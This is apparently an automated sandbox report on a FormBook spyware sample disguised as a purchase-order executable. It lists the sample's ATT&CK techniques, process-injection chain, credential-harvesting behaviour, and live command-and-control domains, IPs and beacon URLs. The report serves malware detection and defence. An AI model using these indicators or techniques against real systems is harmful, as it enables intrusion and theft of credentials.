0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PO-DOC1522025-12.exeBinary or memory string: WIN_XPe
            Source: PO-DOC1522025-12.exeBinary or memory string: WIN_VISTA
            Source: PO-DOC1522025-12.exeBinary or memory string: WIN_7
            Source: PO-DOC1522025-12.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.4621809229.00000000008B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2301039280.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4623753235.0000000004BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2299849975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4621727339.0000000000870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2301133615.0000000006990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4615833693.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4621737352.0000000005960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_001C1204
            Source: C:\Users\user\Desktop\PO-DOC1522025-12.exeCode function: 0_2_001C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_001C1806
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials12
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591632 Sample: PO-DOC1522025-12.exe Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.shenzhoucui.com 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 PO-DOC1522025-12.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 wRnnQBtyTqqaEOnAYYgvzRWAV.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 wRnnQBtyTqqaEOnAYYgvzRWAV.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49913, 49914, 49915 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 49921, 49922, 49923 REGISTER-ASIT Italy 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            PO-DOC1522025-12.exe31%VirustotalBrowse
            PO-DOC1522025-12.exe42%ReversingLabsWin32.Trojan.Generic
            PO-DOC1522025-12.exe100%AviraDR/AutoIt.Gen8
            PO-DOC1522025-12.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.rssnewscast.com/fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVV100%Avira URL Cloudmalware
            http://www.elettrosistemista.zip/fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVV100%Avira URL Cloudmalware
            https://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR0%Avira URL Cloudsafe
            http://www.empowermedeco.com0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/?pnGX8L3p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&xZ4P=rRldwLg0ALTXzVV0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVV0%Avira URL Cloudsafe
            http://www.goldenjade-travel.com/fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVV100%Avira URL Cloudmalware
            http://www.techchains.info/fo8o/100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            195.110.124.133
            truefalse
              high
              empowermedeco.com
              217.196.55.202
              truefalse
                high
                www.3xfootball.com
                154.215.72.110
                truefalse
                  high
                  www.goldenjade-travel.com
                  116.50.37.244
                  truefalse
                    high
                    www.rssnewscast.com
                    91.195.240.94
                    truefalse
                      high
                      www.techchains.info
                      66.29.149.46
                      truefalse
                        high
                        natroredirect.natrocdn.com
                        85.159.66.93
                        truefalse
                          high
                          www.magmadokum.com
                          unknown
                          unknowntrue
                            unknown
                            www.donnavariedades.com
                            unknown
                            unknownfalse
                              high
                              www.660danm.top
                              unknown
                              unknowntrue
                                unknown
                                www.joyesi.xyz
                                unknown
                                unknownfalse
                                  high
                                  www.liangyuen528.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.kasegitai.tokyo
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.empowermedeco.com
                                      unknown
                                      unknownfalse
                                        high
                                        www.k9vyp11no3.cfd
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.elettrosistemista.zip
                                          unknown
                                          unknownfalse
                                            high
                                            www.shenzhoucui.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.antonio-vivaldi.mobi
                                              unknown
                                              unknowntrue
                                                unknown
                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.empowermedeco.com/fo8o/false
                                                  high
                                                  http://www.rssnewscast.com/fo8o/?pnGX8L3p=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&xZ4P=rRldwLg0ALTXzVVtrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.goldenjade-travel.com/fo8o/?pnGX8L3p=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&xZ4P=rRldwLg0ALTXzVVtrue
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  http://www.magmadokum.com/fo8o/?pnGX8L3p=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=&xZ4P=rRldwLg0ALTXzVVtrue
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.elettrosistemista.zip/fo8o/false
                                                    high
                                                    http://www.magmadokum.com/fo8o/false
                                                      high
                                                      http://www.rssnewscast.com/fo8o/false
                                                        high
                                                        http://www.elettrosistemista.zip/fo8o/?pnGX8L3p=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=&xZ4P=rRldwLg0ALTXzVVtrue
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://www.goldenjade-travel.com/fo8o/false
                                                          high
                                                          http://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&xZ4P=rRldwLg0ALTXzVVtrue
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.techchains.info/fo8o/true
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.empowermedeco.comwRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4623753235.0000000004C3D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.4623285061.0000000003E5E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4625520425.0000000005D00000.00000004.00000800.00020000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.000000000334E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.sedo.com/services/parking.php3wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.000000000334E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.4623285061.0000000004182000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003672000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.4623285061.0000000004182000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003672000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.empowermedeco.com/fo8o/?pnGX8L3p=mxnRnetbtugc.exe, 00000004.00000002.4623285061.00000000047CA000.00000004.10000000.00040000.00000000.sdmp, wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4622092950.0000000003CBA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  91.195.240.94
                                                                                  www.rssnewscast.comGermany
                                                                                  47846SEDO-ASDEfalse
                                                                                  154.215.72.110
                                                                                  www.3xfootball.comSeychelles
                                                                                  132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                  195.110.124.133
                                                                                  elettrosistemista.zipItaly
                                                                                  39729REGISTER-ASITfalse
                                                                                  116.50.37.244
                                                                                  www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                  18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                  85.159.66.93
                                                                                  natroredirect.natrocdn.comTurkey
                                                                                  34619CIZGITRfalse
                                                                                  66.29.149.46
                                                                                  www.techchains.infoUnited States
                                                                                  19538ADVANTAGECOMUSfalse
                                                                                  217.196.55.202
                                                                                  empowermedeco.comNorway
                                                                                  29300AS-DIRECTCONNECTNOfalse
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1591632
                                                                                  Start date and time:2025-01-15 08:27:06 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 10m 37s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:9
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:2
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:PO-DOC1522025-12.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@16/7
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 75%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 90%
                                                                                  • Number of executed functions: 45
                                                                                  • Number of non-executed functions: 303
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50, 4.245.163.56
                                                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  TimeTypeDescription
                                                                                  02:28:53API Interceptor12804110x Sleep call for process: netbtugc.exe modified
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  91.195.240.94Payment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  WBI835q8qr.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  DHL-DOC83972025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  BP-50C26_20241220_082241.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  rDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.rssnewscast.com/fo8o/
                                                                                  154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                  N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                  Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  www.3xfootball.comPayment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  WBI835q8qr.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  DHL-DOC83972025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  BP-50C26_20241220_082241.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  rDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  POWERLINE-AS-APPOWERLINEDATACENTERHKhttps://mywhats.chat/Get hashmaliciousUnknownBrowse
                                                                                  • 156.251.25.108
                                                                                  Payment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                                  • 154.215.72.110
                                                                                  https://afwkqc.com/Get hashmaliciousUnknownBrowse
                                                                                  • 154.193.113.233
                                                                                  https://wap.sunblock-pro.com/Get hashmaliciousUnknownBrowse
                                                                                  • 154.193.113.232
                                                                                  i686.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.244.6.20
                                                                                  https://www.xietaoz.com/Get hashmaliciousUnknownBrowse
                                                                                  • 154.193.113.233
                                                                                  http://wap.escritoresunidos.com/Get hashmaliciousUnknownBrowse
                                                                                  • 154.193.113.233
                                                                                  http://m.activeselfie.com/Get hashmaliciousUnknownBrowse
                                                                                  • 154.193.113.232
                                                                                  http://m.ccsurj.org/Get hashmaliciousUnknownBrowse
                                                                                  • 154.193.113.233
                                                                                  http://www.activeselfie.com/Get hashmaliciousUnknownBrowse
                                                                                  • 154.193.113.233
                                                                                  REGISTER-ASITPayment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  WBI835q8qr.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DHL-DOC83972025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  BP-50C26_20241220_082241.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  rDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 195.110.124.133
                                                                                  DONGFONG-TWDongFongTechnologyCoLtdTWPayment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  WBI835q8qr.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  DHL-DOC83972025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  BP-50C26_20241220_082241.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  rDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 116.50.37.244
                                                                                  SEDO-ASDEPayment Notification Confirmation 010_01_2025.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  WBI835q8qr.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.123
                                                                                  DHL-DOC83972025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  http://thehalobun.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                  • 91.195.240.19
                                                                                  BP-50C26_20241220_082241.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  rDHL8350232025-2.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                  • 91.195.240.94
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
